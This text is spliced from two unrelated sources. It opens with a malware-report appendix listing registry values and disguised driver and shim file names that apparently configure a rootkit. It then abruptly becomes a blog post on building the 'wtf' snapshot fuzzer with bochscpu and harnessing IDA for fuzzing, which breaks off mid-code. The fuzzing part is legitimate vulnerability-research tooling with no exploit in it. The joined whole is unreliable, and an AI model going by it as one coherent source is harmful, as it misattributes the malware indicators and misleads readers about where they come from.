\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;


Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and slow to start. The snapshot approach could help fuzz it faster than a traditional approach would,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel crash dumps, which is essential for wtf. So I wrote kdmp-parser, a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available off the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a WinDbg Javascript extension to do the work, so I reused it: bdump.js.
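
As a quick taste, reading a physical page out of a dump looks roughly like the sketch below, assuming an interface shaped like the Parse / GetPhysicalPage calls used later in this post; the exact names may differ from the library:

#include "kdmp-parser.h"
#include <cstdio>

int main(int argc, char **argv) {
  if (argc != 2) {
    printf("usage: %s <dump>\n", argv[0]);
    return 1;
  }

  kdmpparser::KernelDumpParser Dmp;
  if (!Dmp.Parse(argv[1])) {
    printf("Failed to parse %s\n", argv[1]);
    return 1;
  }

  //
  // Grab the content of a physical page out of the dump; nullptr means the
  // page is not present in the dump.
  //

  const uint64_t Gpa = 0x1000;
  const uint8_t *Page = Dmp.GetPhysicalPage(Gpa);
  printf("GPA %#llx %s in the dump\n", (unsigned long long)Gpa,
         Page ? "is" : "is not");
  return 0;
}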

Once I was able to extract the physical memory & the CPU state, I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time, so I started there. bochscpu is basically bochs's CPU exposed as a Rust library with C bindings (yes, he kindly made the bindings because I didn't want to touch any Rust). It is essentially a software CPU that knows how to run Intel 64-bit code and knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs' devices, so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump.
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, which is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.
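
To illustrate the physical case, a write that may straddle a page boundary can be split like in the sketch below; PhyTranslate stands in for the GPA→HVA lookup (bochscpu_mem_phy_translate in the bochscpu backend) and the Offset() helper, returning the offset of the GPA within its page, is an assumption rather than wtf's actual API:

bool PhyWrite(const Gpa_t Gpa, const uint8_t *Buffer, const uint64_t BufferSize) {
  uint64_t Written = 0;
  while (Written < BufferSize) {
    const Gpa_t Current = Gpa_t(Gpa.U64() + Written);

    //
    // Only write up to the end of the current page; the next GPA page may be
    // backed by a completely unrelated HVA page.
    //

    const uint64_t PageRemaining = Page::Size - Current.Offset();
    const uint64_t Size = std::min(PageRemaining, BufferSize - Written);

    uint8_t *Hva = PhyTranslate(Current);
    if (Hva == nullptr) {
      return false;
    }

    memcpy(Hva, Buffer + Written, Size);
    Written += Size;
  }

  return true;
}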

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loops

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global state to retrieve the offsets of some critical structures. We've built memory access facilities so you can definitely do that, but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.
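
To give an idea of what this looks like, here is a hedged, stripped-down sketch of resolving a symbol from a crash dump with the dbgeng COM interfaces; this is not the actual Debugger_t code, the dump path is made up, and error handling is omitted:

#include <windows.h>
#include <dbgeng.h>
#include <cstdio>

#pragma comment(lib, "dbgeng.lib")

int main() {
  IDebugClient *Client = nullptr;
  IDebugControl *Control = nullptr;
  IDebugSymbols *Symbols = nullptr;

  //
  // Create the debug client and grab the control / symbols interfaces.
  //

  DebugCreate(__uuidof(IDebugClient), (void **)&Client);
  Client->QueryInterface(__uuidof(IDebugControl), (void **)&Control);
  Client->QueryInterface(__uuidof(IDebugSymbols), (void **)&Symbols);

  //
  // Load the crash dump and wait for the engine to finish processing it.
  //

  Client->OpenDumpFile("state\\mem.dmp");
  Control->WaitForEvent(DEBUG_WAIT_DEFAULT, INFINITE);

  //
  // Resolve a symbol into a virtual address.
  //

  ULONG64 Offset = 0;
  Symbols->GetOffsetByName("ntdll!RtlDispatchException", &Offset);
  printf("ntdll!RtlDispatchException @ %#llx\n", Offset);

  Symbols->Release();
  Control->Release();
  Client->Release();
  return 0;
}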

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure.
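
To give a flavor of it, this is roughly what such a hook could look like with the SetBreakpoint API shown later in this post; ReportCrash is a placeholder for however the backend records the crashing test case and stops the virtual cpu, not wtf's actual function name:

if (!g_Backend->SetBreakpoint(
        "ntdll!RtlDispatchException", [](Backend_t *Backend) {
          //
          // An exception is being dispatched in the guest: treat the current
          // test case as a crash and stop execution.
          //

          fmt::print("RtlDispatchException hit, reporting a crash.\n");
          ReportCrash(Backend);
        })) {
  return false;
}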

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding those options, it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
